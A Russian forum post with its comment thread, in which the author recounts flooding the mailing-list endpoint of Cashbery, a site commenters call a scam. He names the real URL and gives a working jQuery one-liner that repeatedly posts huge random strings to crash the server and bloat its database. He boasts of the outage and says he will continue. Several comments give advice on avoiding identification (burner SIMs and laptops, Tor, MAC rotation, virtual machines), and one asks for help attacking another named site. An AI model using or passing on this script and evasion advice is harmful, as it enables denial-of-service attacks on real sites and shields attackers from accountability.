7244

Шлём `Привет` кэшбери

Вижу пост

Не долго парясь нахожу в интернете их сайт http://gdc.group


Ооокей... Смотрим что там и как. И оказывается что фильтр почты, которую к ним на рассылку можно закинуть - фиктивный. Те если отправить руками то можно записать что угодно.


http://gdc.group/files/action/ajax.php?email=1


Методом перебора узнаём что под поле почты выделено 32милиионов(2^25) символов строка... А это 32 мегабайта.


Пишем небольшой скрипт


i=0; spam = () => { $.post('http://gdc.group/files/action/ajax.php', { email: Array(2**25).fill().map(()=>{ return String.fromCodePoint(~~(Math.random(1, 255) * 255)) }).join('') }, (a)=>{console.log(++i, a); spam();}); }; spam();

Хотя на деле лучше степень 20 гдето, потому как на лимите там памяти не хватает.


Ну и итого всё..) Память у сервиса кончилась, удачи разрабам разгребать говно и фиксить дыры..)

Как минимум гигов на 10 в базу я поднасрать успел, пока память не закончилась... Если ребутнут не пофиксив, продолжим...


Такие успешные парни, а найти разраба не из студентов не смогли =\


Теперь всегда так:

Fatal error: Allowed memory size of 268435456 bytes exhausted (tried to allocate 4304128 bytes) in /home/bitrix/ext_www/gdc.group/files/action/ajax.php on line 8

Ещё и битрикс... Фи...

Вы смотрите срез комментариев. Показать все
515
Автор поста оценил этот комментарий
И внизу домашний адрес ТСа с припиской «это всё он».
раскрыть ветку (14)
336
Автор поста оценил этот комментарий
Иллюстрация к комментарию
раскрыть ветку (12)
94
Автор поста оценил этот комментарий
раскрыть ветку (11)
67
Автор поста оценил этот комментарий
Видео Энджойкина заминусовали, ироды. Что с этим миром не так?
раскрыть ветку (9)
16
Автор поста оценил этот комментарий

Это из-за Черникова все)

раскрыть ветку (4)
5
Автор поста оценил этот комментарий

А чего его хейтят?

раскрыть ветку (1)
0
Автор поста оценил этот комментарий

Из за "инфозомби пластмассы" наверное

Автор поста оценил этот комментарий
Сперва добейся
раскрыть ветку (1)
3
Автор поста оценил этот комментарий

Ник, перелогинься)

ещё комментарии
14
Автор поста оценил этот комментарий
А за что челу минусы? Это из разряда "уберите эту пошлятину"?
https://pikabu.ru/story/priplyili_6303311
4
Автор поста оценил этот комментарий
Это он, это он
Ленинградский почтальон
148
Автор поста оценил этот комментарий
А деньги по E-mail долго идут? :)
Иллюстрация к комментарию
раскрыть ветку (12)
36
Автор поста оценил этот комментарий
- Таня, слышала? "Деньги по е-мэйлу"!
- Вот ботаны гнойные! 
раскрыть ветку (5)
16
Автор поста оценил этот комментарий

а в 2018 переслать деньги на мыло уже стало реальностью )

раскрыть ветку (4)
11
Автор поста оценил этот комментарий

Пс, не хочешь купить свежий биткоин, ещё не рассчитанный?

раскрыть ветку (1)
11
Автор поста оценил этот комментарий

В нашем городе мужику на вокзале цыгане продали биткойн. Монетка в пластиковой упаковке. Так и написано 1btc и значок. Запарили его мол ты чо не слышал по телеку везде твердят, ща скакнёт курс миллионером будешь. Продали что то вроде за 5000... даже по новостям показывали :)

3
Автор поста оценил этот комментарий

Яндекс.Дэнги

раскрыть ветку (1)
1
Автор поста оценил этот комментарий

деньги сейчас даже часами можно передавать ))


и не только: https://www.youtube.com/watch?v=Vx2d97gXK0Y ))

2
Автор поста оценил этот комментарий

такой теплый фильм

раскрыть ветку (5)
3
Автор поста оценил этот комментарий

ламповый)

Иллюстрация к комментарию
2
Автор поста оценил этот комментарий
Ну да. Хотя, на мой вкус, концовка слабовата.
раскрыть ветку (3)
Автор поста оценил этот комментарий

да он весь слабоват, просто ламповый за счет ностальгии

раскрыть ветку (2)
0
Автор поста оценил этот комментарий
За счёт атмосферы своего времени
0
Автор поста оценил этот комментарий

Я бы не сказал.

48
Автор поста оценил этот комментарий

А если принесёте ещё немного денег,то починим и вернём. Спешите,злобные хакеры не дремлют и могут совсем все сломать!!!

8
Автор поста оценил этот комментарий

Ждите теперь новости от КШБ: "Дорогие вкладчики. У нас уже было всё готово для возврата денег нашим вкладчикам, но злобные хакеры провели атаку на нашу почту - всё к херам поломали. Теперь точно не сможем ничего вернуть. С сожалением сообщаем Вам об этом"

Неее...

Тут уже можно и получше оформить:

"Дорогие вкладчики. У нас уже было всё готово для возврата денег нашим вкладчикам, но злобные хакеры провели атаку на наш сайт и украли все, абсолютно все подготовленные к выдаче деньги. С сожалением сообщаем Вам об этом"

Ну и рядом паспортные данные ТС, не без того.

0
Автор поста оценил этот комментарий
Дык тс поди сам из этих. Тут типа заговнил сайт, сам признался. Они не причём хД
29
Автор поста оценил этот комментарий

Правоохранителей наших не знаешь, что ли...

раскрыть ветку (18)
15
Автор поста оценил этот комментарий

Ниче не знаем, пишите заявление. (с)

раскрыть ветку (2)
9
Автор поста оценил этот комментарий
Убьют - вот тогда и звоните. (С)
раскрыть ветку (1)
15
Автор поста оценил этот комментарий

Убьют, вот тогда - извините.

20
Автор поста оценил этот комментарий
Они могут постики в контакте почитать и за экстремизм посадить. Проще это, не надо голову ломать, хакеров-хмахеров нанимать, в интернетав ентих разбираться.
раскрыть ветку (14)
26
Автор поста оценил этот комментарий
Менты вообще мало что могут. Фейсы чуть поболее. Уверен что есть какой нить отдел супер К которому доступны все технологии, сорм, сорм2, сотовые операторы, камеры из единой системы... и все без запросов. А мент, да даже из отдела К кучу писулек сначала напишет, потом ждёт неделями... Так что если ты через кучу проксей и впнов вывел разок у соседа 20к рублей со Сбера то нахер тебя кто искать будет. Ну а если ломанешь банковскую систему другое дело... Да и всех кто способен сломать что то серьезное товарищ майор держит на карандаше. Хотя в свете последних событий с подрывником куда смотрела сорм2, почему не отработали скрипты на стоп-слова, а они явно были. Или дохуя ложно-положительных сработок замылили глаза майора?
раскрыть ветку (13)
6
Автор поста оценил этот комментарий

куда смотрела сорм2, почему не отработали скрипты на стоп-слова, а они явно были. Или дохуя ложно-положительных сработок замылили глаза майора?

Это примерно как рамки металлоискателей в метро.

Ну поставили, ну рядом кучка сотрудников всегда бдит. А толку?

Если рамка пищит на КАЖДОГО гражданина - а весь поток останавливать и каждого проверять дотошно все равно не будешь)

11
Автор поста оценил этот комментарий
во всем виноват Дуров-не дал им ключи от телеграма)
раскрыть ветку (4)
25
Автор поста оценил этот комментарий
Так Дуров для этого и делал свой телеграмм, по заказу Игила,Аль-Каиды, якудзы и т.д . Все плохиши скинулись, родили Дурова сначала, потом вырастили и сказали писать телегу, чтобы можно было взрывать и взрываться безопасно от спецслужб.
раскрыть ветку (3)
9
Автор поста оценил этот комментарий
Безопасно взрываться...записал
0
Автор поста оценил этот комментарий

многоходовочка ))

0
Автор поста оценил этот комментарий
Да-да, я даже фото дурова-игиловца видел!!1! Он против россиюшки! И мира во всём мире.
0
Автор поста оценил этот комментарий

ага, если бы. отдел К так же без электронного документооборота сидит и заявы теряют как остальные бездельники.

0
Автор поста оценил этот комментарий

Ты вообще о чем? Что за сорм2?

раскрыть ветку (5)
10
Автор поста оценил этот комментарий
Гугл в помощь)
а если коротко то полное зеркалирование твоего трафика
раскрыть ветку (4)
5
Автор поста оценил этот комментарий

базу собрали - искать по базе не собрали. (ибо в требованиях госконтракта уверен что этого не было хехе.)


Хотя большое поле для "порезвится" для всяких машинных обучений и математиков-погромистов.

1
Автор поста оценил этот комментарий

А оно имеет смысл? Если трафик передаётся по https. И что получит прмежуточный сервер фсб? Будет хранить случайные нолики и единички?

раскрыть ветку (2)
3
Автор поста оценил этот комментарий

Все имеет смысл, СОРМ ставит у себя провайдер, те же сайты на которые мы заходим шифруют трафик с помощью ключей шифрования, которые находятся в сертификатах, которые выдают удостоверяющие центры(УЦ), что мешает людям сверху обратится в УЦ для получения доп информации?

раскрыть ветку (1)
3
Автор поста оценил этот комментарий

Мешает то, что ни один крупный центр не выдаст ключ шифрования трафика России. Это невозможно. Поскольку на этом деятельность СЦ прекратится.

179
Автор поста оценил этот комментарий
ДА !Я ДАВНО ЭТОГО ЖДАЛ. Почему в реальности нет этих благородных хакеров !??почему не находят и не взламывают депутатов ,педрополита мудила , хахалеву ,судей которые не за что сажают типо педофилов, и присуждают армянам бобос, а очкариков судят, где блять эти благородные Робин Гуды 21века !?
раскрыть ветку (132)
78
Автор поста оценил этот комментарий
потому что на каждого хитреца найдётся хитрец с их стороны и сидеть никто не хочет
раскрыть ветку (95)
15
Автор поста оценил этот комментарий
Да что то хуёво у них с этим . Судя по ведомствам которые с интернетом призваны работать .
раскрыть ветку (84)
109
Автор поста оценил этот комментарий
Поверь, там все хорошо, просто направлено не в ту сторону, и далеко не все новости тебе показывают. Тор не гарант анонимности, реально анонимен ты будешь, если тормознешь, у какого-нибудь дома в проходимом месте, но без камер, распечатаешь новую симку, хз на кого, достанешь новый ноут, тоже купленный без палева, по-быстрому взломаешь что нужно, ноут выбросишь вместе с симкой и свалишь куда подальше, также мимо камер. Ах да, и самое главное, чтобы местная пенсионерка тебя не заметила, которая всех проституток и наркоманов в лицо знает.
раскрыть ветку (82)
27
Автор поста оценил этот комментарий
Так же выключить свою основную симку примерно кварталов за 10, да и ноут нужен новый, не выходивший в сеть ни разу.
раскрыть ветку (79)
49
Автор поста оценил этот комментарий
- А чой это у нас хакер СтрлШифтЭск симку свою на полчаса выключал, как раз когда сайт ведрополита хакнули? Давай-ка пройдемся по камерам от его дома. А пока видео собирают, тащи его к нам - попробуем сами расколоть быстренько.
- Разрешите выполнять, тащщ майор?
- Разрешаю. Бегом марш!
раскрыть ветку (7)
16
Автор поста оценил этот комментарий

что-то баш вспомнился


#397877

"Системный администратор Юкоса при обыске заявил, что для взлома паролей на базы данных потребуется несколько лет интенсивной работы многих компьютеров. ОМОНовцы "узнали" пароль за 5 минут, 3 минуты из которых они привязывали админа к стулу..."
4
Автор поста оценил этот комментарий

Ах ты ж

Надеюсь, ты не там работаешь

раскрыть ветку (5)
7
Автор поста оценил этот комментарий
Не, не там )))

Помню на пикабу один юзер постил немного из методики работы с сотовой связью у нормальных оперов. Там как раз подобное и описывалось.
раскрыть ветку (3)
1
Автор поста оценил этот комментарий
Никак нет! Этот не наш!
18
Автор поста оценил этот комментарий
Ладно запугивать то. Что там в ноуте кроме мак адреса то? Он меняется кучей тулов непрерывно
раскрыть ветку (64)
38
Автор поста оценил этот комментарий

да хуй Вас знает, тов. Майор

5
Автор поста оценил этот комментарий
Где-то на хабе была статья о скрытых виртуальных машинах на процессерах, которые хуй пойми чем занимались и имели все возможности для доступа к сети. Когда ТС через свое руководство написал запрос в ФСБ, то им мягко намекнули чтобы не лезли не в свое дело. Так что, хуй его знает
раскрыть ветку (6)
6
Автор поста оценил этот комментарий

https://xakep.ru/2011/12/26/58104/  не оно случаем?

раскрыть ветку (1)
1
Автор поста оценил этот комментарий

последняя часть вашего текста несет в себе истину :). Аппаратные закладки да, бывают, но не в обычных дешевых ноутбуках, они там нахрен не нужны. Я как то по работе писал отчет на эту тему, еще по свежим следам разоблачений системы Призма Сноуденом :)

раскрыть ветку (2)
0
Автор поста оценил этот комментарий
Надо было озвучить это на одной из международных конференций по информационной безопасности.
0
Автор поста оценил этот комментарий
Id оборудования(вифи, и еще несколько) , которые получают сайты. Есть обходы, но если захотеть, можно увидеть адреса где устройства подключались.
раскрыть ветку (50)
19
Автор поста оценил этот комментарий
Это и есть мак-адрес, но видят его только устройства в той же сети, в данном случае оператор увидит лишь мак адрес модема, в модем левый замутить довольно дёшево, потом выкинуть вместе с такой же левой симкой и заебутся искать (если, конечно, камера или прохожий не вспомнит подозрительного парня, который сидел в машине с ноутом, а потом пошел выкинул модем)
раскрыть ветку (25)
4
Автор поста оценил этот комментарий

Блин, народ, если не разбираетесь, то чего гадать то? Браузер (без плагинов, троянов и прочего дерьма) может передать на сервак сайта имя браузера, версию операционки, разрешение экрана, наборы шрифтов в системе и еще кое какую мелочевку. Еще айпи адрес само собой. Точка доступа в принципе может записать в лог мас адрес (а может и не записать). Ставишь на ноутбук линух, тулу для постоянной ротации рандомных мак адресов, десяток виртуальных машин для выхода в инет с разных операционок и браузеров и товарищ майор тебя нихрена не найдет, от слова  совсем. Конечно подразумевается, что для серьезных хаков ты юзаешь тор, i2p и еще кое какие полезные вещи, твой ноут зашифрован до упора веракриптом или аналогами и паттерны перемещений твоего легального мобильника нельзя скоррелировать с твоими выходами в сетку для хаков.

раскрыть ветку (23)
Автор поста оценил этот комментарий
Твой пк генерит уникальный хеш, по нему с вероятностью 95% можно определить что это тот же комп. А сам комп вряд-ли будешь тщательно чистить после выхода в сеть. Так что найти комп дело техники. Например, авторизируешься где то в ВК и генеришь тот же хеш
раскрыть ветку (4)
1
Автор поста оценил этот комментарий
Вот только какой нормальный хакер будет пользоваться ВК на виртуалке, которую он использует для нелегальных дел? При этом зашифровать раздел с виртуалкой ещё можно и тогда даже изъяв ноут никто и никогда не узнает что там (если не дашь им ключ). Хороших хакеров по другим следам находят, а не по железу.
0
Автор поста оценил этот комментарий

Расскажи, какая именно часть пк генерит "уникальный хеш", какие вызовы браузера ее используют, как они передаются из клиентского браузера на сервер вк. И что мне помешает поставить гипервизор на комп и юзать на для выхода в сеть исключительно одну из сотни  рандомно созданных виртуалок, с рандомными дивайсами, настройками вм и прочим.

раскрыть ветку (2)
5
Автор поста оценил этот комментарий

Не выключить, а дома оставить. А то у товарища майора вопросы могут быть)

раскрыть ветку (2)
0
Автор поста оценил этот комментарий

А почему оставил? Где был целый день? Обычно ты на работе в это время, а в тот день камеры кафе, что рядом с твоей работой тебя не показали... Подозрительно

раскрыть ветку (1)
0
Автор поста оценил этот комментарий

Забыл.

0
Автор поста оценил этот комментарий

Не просто выключить, а завернуть телефон в фольгу

0
Автор поста оценил этот комментарий

Зачем новый ноут?))

раскрыть ветку (1)
0
Автор поста оценил этот комментарий
А мобилу новую зачем?
0
Автор поста оценил этот комментарий

При этом надо пробовать на месте не более получаса

0
Автор поста оценил этот комментарий

Kali Linux на LiveUSB и не надо танцев с бубном.

0
Автор поста оценил этот комментарий
не ну на создание видимости работы можно и дурачков набрать типа деток министров или даже самому нос всунуть, а если надо - поверь, они замарочатся
0
Автор поста оценил этот комментарий
Нет. Потому, что лень...........
ещё комментарии
36
Автор поста оценил этот комментарий

Что, по вашему должен сделать хакер, что бы наказать тех кого вы указываете?

Хахалева сидит с недействительным дипломом. Любой сторонний человек быстро это проверяет. Но у комиссии "нет вопросов к уважаемой судье".

Дела с очкариком и тренером в открытом доступе. Судьи, прокуроры обвинения не скрыты. Любой может узнать кто там был. В соответствующих новостях есть имена. Этим людям что нибудь сделали с официальной стороны? Ну там хоть проверили материалы дела? "У нас есть доказательство которое никто не видел и никому не покажем, но одних слов, что оно есть достаточно для обвинительного приговора".


Ну и что может сделать "белый" хакер? Найти инфу что у Хахалевой и диплом ветеринара поддельный? Так "Всем насрать".

Взломать счета в банке? Ну бедным господам всё компенсируют и в итоге недостача ляжет на низших работников банка.


Все ваши примеры объединяет одно - "Полная безнаказанность". Людей выше тех которых вы указали полностью устраивает работа тех кого вы указали. И пока так будет этичного метода борьбы не существует.

раскрыть ветку (10)
17
Автор поста оценил этот комментарий
На самом деле с хахалевой ситуация такая, что похоже ее покрывает кто то из высшего руководства, ибо только глухой в этой стране о ней не слышал, а властям похер (обычную судью бы давно уволили задним числом, а может и посадили бы). Насчёт очкарика история мутная, я сам понять не могу кто прав, а кто нет, мы то слышим мнение лишь одной стороны, но если очкарик прав и пойдет с апелляцией в вышестоящие суды - то есть ненулевая вероятность, что у его оппонентов на определенном этапе закончатся связи/деньги. Про тренера - да у нас в принципе законы про изнасилования и домогательства так построены, что ничего доказывать не нужно, куча примеров уже было, законы менять надо, но нашим депутатам не до этого, видимо, надо же НДС поднимать
раскрыть ветку (3)
10
Автор поста оценил этот комментарий

Лет 10 назад педалировалась тема что насильники и педофилы остаются безнаказанными, так как доказательную базу собрать очень сложно. Пострадавшим нужно самим собирать доказательства, проводить экспертизы, пинать следователя и т.д.

Сейчас, видимо, маятник качнулся в другую сторону. Чтобы посадить человека достаточно слов “пострадавших”.

раскрыть ветку (1)
0
Автор поста оценил этот комментарий

Ну тут вообще действительно не такая прям простая тема по поводу доказательств изнасилований, обычно ведь это происходит наедине и вряд ли жертва к этому заранее готовится, так что пруфы тут собрать действительно непросто, но нужно искать какой-то баланс, ибо сейчас закон очень сильно перекошен в сторону жертвы

2
Автор поста оценил этот комментарий

Чьим приказом назначена, тот и прикрывает

0
Автор поста оценил этот комментарий
Любой сторонний человек быстро это проверяет
А как?
раскрыть ветку (1)
0
Автор поста оценил этот комментарий

Вы про диплом? Ну к примеру, соответствующее ведомство, всем запрашивающим выдаёт справку что диплом с таким номером никогда не выдавался в Российской Федерации. Никаким ВУЗом. Никому. Ни по какой специальности.


Одно это делает "диплом" раскрашенной бесполезной бумажкой. Все последующие пляски с поиском ВУЗа которое скажет "да она у нас училась" уже для дополнительного нагнетания и рейтингов.

0
Автор поста оценил этот комментарий

написали смешно,  а ситуация страшная.

раскрыть ветку (2)
0
Автор поста оценил этот комментарий

Странно, я как раз и пытался напугать, а не рассмешить...

раскрыть ветку (1)
1
Автор поста оценил этот комментарий

Ну вообще это жестко, и как бы жиза, и как-бы, вообще в голове не укладывается. что действительно такое дерьмо происходит, а люди все глаза закрыли. втч и я. потому что уже "подкоркой" заложено: а че мы сделаем. А это еще у нас такие мысли возникают, что мол хуита происходит не здоровая вокруг, и всем пох. А что будет с поколением 2000. Которые кроме, этой власти ничего не видели. и которые с детства за этим наблюдают. Даже страшно иной раз радикальные комментарии оставлять, так как можно "сесть на карандаш" и в прямом и переносном смысле.

Автор поста оценил этот комментарий
Да я от куда знаю воровать у них со счетов )))
18
Автор поста оценил этот комментарий
Вам выборов в Америке не хватило?!
Иллюстрация к комментарию
раскрыть ветку (6)
26
Автор поста оценил этот комментарий

Хыхы) Не поверишь, работал в конторе, которая на них влияла..)

раскрыть ветку (5)
24
Автор поста оценил этот комментарий

Завтра скрин  с вашим комментом будет неоспоримым доказательством где нибудь в оон=)

раскрыть ветку (1)
19
Автор поста оценил этот комментарий

в ооооооон там)

3
Автор поста оценил этот комментарий

постил в тивттере ?

1
Автор поста оценил этот комментарий
В штабе Клинтон, что ли?
0
Автор поста оценил этот комментарий

Подробнее?)

10
Автор поста оценил этот комментарий
В общем, в хакерском мире есть негласное правило: "Нельзя идти против своей страны". Иначе их быстро закрывают власти. Такие дела. Если нужны пруфы, то могу поискать. Где-то на Хабре перевод статьи был недавно
раскрыть ветку (6)
3
Автор поста оценил этот комментарий

Это такой воспитательный вброс для молодых энтузиастов. Подобные статьи появляются регулярно. Тем, кто такие материалы воспринимает всерьез, категорически не следует идти в теневую сферу, ибо легковерные долбоебы и готовое мясо для первого же хищника.

1
Автор поста оценил этот комментарий

Да вроде это в журнале хакер в лохматом 2000 году постулировали. Даже если прикрыл жопу пятью впн и сидишь с калькулятора с ядром своей сборки.

0
Автор поста оценил этот комментарий

Если не обломаешься, найди плиз)

раскрыть ветку (1)
2
Автор поста оценил этот комментарий
0
DELETED
Автор поста оценил этот комментарий

как пример, отечественные кардеры не работают с картами снг и россии...

Автор поста оценил этот комментарий
Что!? Что блять !? Они против своей страны идут если не сворачивают кровь таким пидорасам!
4
Автор поста оценил этот комментарий

Ну Анонимусы что-то подобное делали, только не с российскими персонажами.

1
Автор поста оценил этот комментарий
Потому что толку нет. Ну вот достанут они инфу что хахалева действительно не получала юр.образования и что дальше? Это итак все знают, это подтверждено самим учебным учреждением. Что дальше?
раскрыть ветку (5)
0
DELETED
Автор поста оценил этот комментарий
Вообще то нет, не все знают. Не выкладывают полную информацию по проверке её дипломов. Нам только одну сторону медали показывают
раскрыть ветку (3)
3
Автор поста оценил этот комментарий

Что-то мне подсказывает, что если бы были документы подтверждающие её обучение, то они давно были бы в сети, ибо они очень легко и просто бы остановили всю волну хайпа. А так - какая "полная информация по проверке диплома" вам нужна? Если её никто не станет проводить. Нет проверки - нет информации - нет оснований не доверять словам судьи?

раскрыть ветку (2)
DELETED
Автор поста оценил этот комментарий
Судейская коллегия проводила проверку. Не выявили нарушений. О процессе проверки имеют законное право не раскрывать. Таков закон
раскрыть ветку (1)
1
Автор поста оценил этот комментарий
Ну так а я о чём говорю? Напрашивается вывод что коллегия пиздит. В чём сложность выложить пару документов, которые доказали бы невиновность? Конечно, проще в баньке посидеть, решить что все путём - народу скажем что нарушений нет, а подробности раскрывать не будем.
0
DELETED
Автор поста оценил этот комментарий
Комментарий удален. Причина: данный аккаунт был удалён
Автор поста оценил этот комментарий

Хэлл когда-то был, да его осудили.

раскрыть ветку (2)
1
Автор поста оценил этот комментарий

Так его деанонимизировали? Почему я не в курсе?

раскрыть ветку (1)
0
Автор поста оценил этот комментарий

Если кратко - впаяли обвинение какому-то мужику, Хэлл лично отрицает, что это он, но в целом, логично, что именно это он бы и делал.

ещё комментарий
47
Автор поста оценил этот комментарий

Не дадут. Лучше не оставлять следов.

раскрыть ветку (23)
53
Автор поста оценил этот комментарий

Ну вопрос масштабности дела. Если бы удалось сделать инъекцию - фиг бы я об этом рассказывал))

раскрыть ветку (22)
27
Автор поста оценил этот комментарий

Польский хакер пытался взломать БД  камер через номер автомобиля)))

Иллюстрация к комментарию
раскрыть ветку (13)
1
DELETED
Автор поста оценил этот комментарий
Для ЛЛ объясните
раскрыть ветку (9)
13
Автор поста оценил этот комментарий

Любые данные в типичную БД вносятся командой вроде ADD ‘Вася’ TO TABLE ‘Алкоголики’ IN DATABASE ‘Бухаем’ (синтаксис совсем фиктивный, есличо): в одной строке передаются и команды, и данные. Если пользователь достаточно хитрожопый,  он может попытаться передать с запросом такие данные, которые БД сочтёт частью команды. Хозяин этой машины попытался таким образом передать команду «удалить базу данных», рассчитывая, что в польском ГИБДД IT-отдел состоит из полных идиотов.

раскрыть ветку (7)
6
Автор поста оценил этот комментарий

Нет, это если разработчик достаточно дебил и не делал экранирования.

раскрыть ветку (4)
0
Автор поста оценил этот комментарий

Одно другому не противоречит

0
Автор поста оценил этот комментарий

Так, а разве в субд не стоит по-умолчанию запрет на дроп всей таблицы? Я, как любитель, уточняю

раскрыть ветку (2)
4
Автор поста оценил этот комментарий

Нет конечно. А как ты её удалишь если понадобится?) Просто нормальные люди делают пользователя который должен допустим только добавлять и редактировать с правами на insert+update

0
Автор поста оценил этот комментарий
защита может быть, но вот например исподвыподверта она может ничего не блокировать..
0
DELETED
Автор поста оценил этот комментарий
А это просто мем? Или это реально сработало?
раскрыть ветку (1)
1
Автор поста оценил этот комментарий
Просто чел пробовал. Не сработало.
6
Автор поста оценил этот комментарий

Если ПО писали черти рукожопые, то при распознавании "номера" этого авто может быть убита таблица с номерами оштрафованных камерой до него.

Если автор данной команды не имеет отношения к разработчика этого ПО, то вероятность такого события крайне мала. А эта картинка специфичный прикол для коллег.

1
Автор поста оценил этот комментарий

А вот комикс на эту тему

Иллюстрация к комментарию
раскрыть ветку (1)
1
Автор поста оценил этот комментарий
Им бы ещё поучиться не называть таблицы во множественном числе.
0
Автор поста оценил этот комментарий

Как же ему проводить слепые инъекции...

7
Автор поста оценил этот комментарий

снести к херам БД... эпично...



Msg 2520, Level 16, State 5, Line 1

Не удалось найти базу данных "[PROD]". База данных не существует или была удалена перед выполнением обращающейся к ней инструкции. Проверьте, что база данных существует, выполнив запрос к представлению каталога sys.databases.

раскрыть ветку (7)
17
Автор поста оценил этот комментарий
Снести, снести... Лучше скачать. База лохов онлайн и без смс
0
Автор поста оценил этот комментарий

для таких дел есть бэкапы)

раскрыть ветку (3)
2
Автор поста оценил этот комментарий
У таких бэкапы обычно тухлые
раскрыть ветку (2)
3
Автор поста оценил этот комментарий
Зато у дата центра, который сдает им хостинг, наверняка ежедневные
раскрыть ветку (1)
Автор поста оценил этот комментарий

:) :) :). Скажем так, не буду комментировать :)

DELETED
Автор поста оценил этот комментарий
И что снести, у любого админа пара тройка бэкапов в разных местах. Восстанавливается моментом.
раскрыть ветку (1)
4
Автор поста оценил этот комментарий

Не факт. Админы делятся на тех, кто делает бэкапы, и тех, кто ещё нет

9
DELETED
Автор поста оценил этот комментарий

Ты же помнишь, что всякие АУЕшники первыми бегут в полицию жаловаться, если им хвост подпалить. Эти тоже с визгами побегут в прокуратуру жалобы писать, и тут даже доказывать ничего не надо, прокуратура с широкой улыбкой это подхватит, получит свою палку, а ты свой в лучшем случае штраф и судимость.

Я бы на твоем месте поаккуратнее был с этим, я серьезно. Зачем тебе эти проблемы?

1
Автор поста оценил этот комментарий

Чувак, я не кэшбери, но я хочу с тобой дружить. Как тебя найти?

раскрыть ветку (2)
1
Автор поста оценил этот комментарий

По нику есть сайт. Там контакты.

раскрыть ветку (1)
0
Автор поста оценил этот комментарий

палишся? так просто?

0
DELETED
Автор поста оценил этот комментарий

мне кажется, что смысла нет так извращаться))
Ну хотят люди быть лохами, ну и пусть, а мы откинемся на спинку кресла и посмотрим на рвущиеся пуканы

0
DELETED
Автор поста оценил этот комментарий
Комментарий удален. Причина: данный аккаунт был удалён
0
Автор поста оценил этот комментарий

а можно для тупых-что именно ты сделал

0
Автор поста оценил этот комментарий
Скорее сделают предложение,от которого не сможешь отказаться )
0
Автор поста оценил этот комментарий

Так может ещё докучи осложнить им жизнь тем, чтоб на главной написать, уважаемые граждане -  не ведитесь на это дерьмо - не будьте лохами :)

0
Автор поста оценил этот комментарий
И быть в инете анонимным.
0
Автор поста оценил этот комментарий

У них как бы такие же права как и у тебя, как бы это странным не казалось. Так что с чего вдруг? Воровать у престпуников тоже воровство и т.д.

0
Автор поста оценил этот комментарий

Это гениально, я даже не думал что так можно) 

0
DELETED
Автор поста оценил этот комментарий

Все круто, только накатят бэкап дневной давности, и прикрутят капчу. И все.

0
Автор поста оценил этот комментарий
Скрипт то довольно быстро наверняка базу засрал, наверняка можно просто записи за этот период все снести и все, делов на 5 минут, если знаешь как оно работает
0
Автор поста оценил этот комментарий

Красавчик!! Хе хе))

ещё комментарий
Автор поста оценил этот комментарий

Да нифига. Одно преступление не отменяет другое, а ты выложил достаточно личной информации, чтобы на тебя можно было ,без проблем открыть дело. Там даже фотка есть в истории сообщений.

Такое нужно делать с левого аккаунта или "перепостом". Чего стоило написать в конце "информацию нашел на просторах интернета"?

Автор поста оценил этот комментарий
Да ты молодец ТС! Давай дави этих капиталистов)))
Автор поста оценил этот комментарий

Тут есть один сайтик поганый! Уже 2 поста с ним борюсь и там пикабушники активно помогают но ничего сделать не удалось:( только репутацию в поисковике им набили:( Может вы чем то поможете?

Посты:

https://pikabu.ru/story/ostorozhno_moshenniki_texnomir24ru_i...

https://pikabu.ru/story/ostorozhno_moshenniki_texnomir24ru_o...


Сайтик ублюдков:
https://texno-mir24.ru/

51
Автор поста оценил этот комментарий
К нам в веб-студию на роль фулл-стак разработчика взяли чела, который до этого через скрипты положил два крупных портала которые мы обслуживали. Мы с горящими жопами всю неделю это разгребали. Причем сделал он это специально, чтобы показать дыры этих порталов и устроиться к нам.

Кто знает, может ТС в Кэшбери метит? :D
57
Автор поста оценил этот комментарий
Мы ТСа не выдадим!
раскрыть ветку (11)
19
Автор поста оценил этот комментарий

Пока нам не заплатят? :-)

раскрыть ветку (3)
26
DELETED
Автор поста оценил этот комментарий

я, конечно, проклинаю всех этих уродов, но 100 рублей есть 100 рублей...

3
Автор поста оценил этот комментарий

кэшберри

раскрыть ветку (1)
6
Автор поста оценил этот комментарий

Кэшбери???!!!

Нам не нужны их грязные деньги!

(а сколько они готовы заплатить?)

1
Автор поста оценил этот комментарий

Но на всякий случай в топ поднимем ;)

0
Автор поста оценил этот комментарий
Уже нашелся один #comment_127081718
0
Автор поста оценил этот комментарий

Вы может быть и не выдадите, а вот админ на официальный запрос, сольет IP, с которого было написано чистосердечное.

0
Автор поста оценил этот комментарий
Подскажите пожалуйста, как расшифровать ”ТС“”
раскрыть ветку (3)
0
Автор поста оценил этот комментарий

Уже в посте писали: ТопикСтартер

0
Автор поста оценил этот комментарий
ТС - топик стартер, автор поста, однако мне больше нравится Товарищ Сталин
раскрыть ветку (1)
0
Автор поста оценил этот комментарий
Спасибо)
17
Автор поста оценил этот комментарий

Они ж не в России, вроде. При чём тут наши статьи.

12
Автор поста оценил этот комментарий
У человека почта длинная. Имеет право
раскрыть ветку (1)
6
Автор поста оценил этот комментарий

256 символов максимум..)

22
Автор поста оценил этот комментарий

ТС скажет - уснул на клавиатуре, вот эти 32Мб символов и улетели на кешбери...)))

28
Автор поста оценил этот комментарий
Ну всё теперь, ТС, жди гостей
Иллюстрация к комментарию
41
Автор поста оценил этот комментарий
спешу расстроить, он просто обратился к базе данных сайта, не попадает под статью)
раскрыть ветку (17)
22
Автор поста оценил этот комментарий

Ну не совсем, если очень захотеть там можно раздуть, но это жесть как захотеть надо.

3
Автор поста оценил этот комментарий

Автор написал вредоносную программу на js, код которой приложил в посте, ее использование привело к нарушению работы сайта, под статью должно попадать. Легкая палка для наших доблестных полиционеров, осторожнее надо быть.

раскрыть ветку (11)
27
Автор поста оценил этот комментарий

Посмотрел по терминам - не попадает под вредоносные программы )

По сути она лишь занималась обращением к их сервису... И опачки я ошибся и отправлялось не то, но мне же фид бека не было что о шибся..)

раскрыть ветку (9)
13
Автор поста оценил этот комментарий
Иллюстрация к комментарию
ещё комментарии
0
Автор поста оценил этот комментарий

Тут как бы сам сайт на говнодвижке. Не стоит забывать об этом.

ещё комментарии
6
Автор поста оценил этот комментарий

Эти еще несколько можно пришить разрабам битрикса.  Особенно первую...

5
Автор поста оценил этот комментарий

"наказываются лишением свободы на срок до трех лет со штрафом в размере до двухсот тысяч рублей". Нет... Не пойдет!

Иллюстрация к комментарию
5
Автор поста оценил этот комментарий
274 статья вообще непонятная - вместо энтер нажал эскейп - нате 2 года зоны )))
1
Автор поста оценил этот комментарий
Кто притянет то? Артур Варданян? Это придуманное имя. Этот чувак просто актёр нанятый)))
раскрыть ветку (1)
0
Автор поста оценил этот комментарий
Ее
0
DELETED
Автор поста оценил этот комментарий
